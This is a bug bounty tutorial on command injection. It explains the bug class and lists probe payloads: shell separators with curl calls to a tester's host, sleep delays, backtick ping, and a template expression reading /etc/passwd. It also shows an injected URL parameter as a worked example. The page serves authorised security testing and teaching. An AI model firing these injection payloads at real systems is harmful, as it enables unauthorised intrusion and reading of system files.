Learning about Command Injection

Command Injection is one of the highest-paying bug classes on bug bounty programs and for very good reason as sometimes it can enable an attacker full control of the target system and allows them to code directly on these systems. Command Injection is when the web application will execute your input via an operating system command. To explain simply, it'll take your command and execute it.

Imagine you have opened your CMD prompt and type ping google.com - this is exactly what is happening here. Believe it or not but command Injection is actually very easy to test for as well as the parameters are infront of you, it's just a simple case of testing! Any parameter can be vulnerable.

When testing for command injection always make sure to respect a companys vulnerability disclosure policy on what commands they'd prefer you to try. Some companies don't want you browsing files you shouldn't or accidentally breaking their website, so make sure to not only read this policy carefully but to stick to the rules.

Finding Code Injections

Honestly, you can literally test every single parameter you find for command injection. Bug bounty programs are usually blackbox testing meaning you have no idea what the code is doing behind the scenes as it isn't open source. So with that in mind, and with viewing some common payloads, where can you go wrong with testing each parameter? You start with having no idea what the parameter is doing bu you can find out by testing it.

| curl https://www.yoursite.com/
|| curl https://www.yoursite.com/
& curl https://www.yoursite.com/
; curl https://www.yoursite.com/
&& curl https://www.yoursite.com/
|| sleep 15
| sleep 15
; sleep 15
& sleep 15 
&& phpinfo()
`ping yoursite.com`
; curl https://www.yoursite.com/
%0a curl https://www.yoursite.com/ %0a
{{ get_user_file("/etc/passwd") }}

Imagine you have the following request along with the view parameter, https://www.example.com/help.php?view=faq and you injected | curl https://www.yoursite.com/, so it was https://www.example.com/help.php?view=faq|%20curl%20https://www.yoursite.com/.

If you receive a request to your site then you have command injection. Don't forget that you can try these parameters on header values as well!

For a full payload list and more information check out the useful payload list as well as https://github.com/payloadbox/command-injection-payload-list

A really good writeup of how to use Burp to test for command injection can be found here: https://support.portswigger.net/customer/portal/articles/2590661-using-burp-to-test-for-os-command-injection-vulnerabilities and a really good writeup on understanding Command Injections can be found here from Jobert from HackerOne here: https://www.hackerone.com/blog/how-to-command-injections.

Test your knowledge with BugBountyHunter Challenges

    We have free labs for this vulnerability coming soon. Currently it is only available on our members web application BARKER.


A list of useful websites, blog posts, reports tools to help you.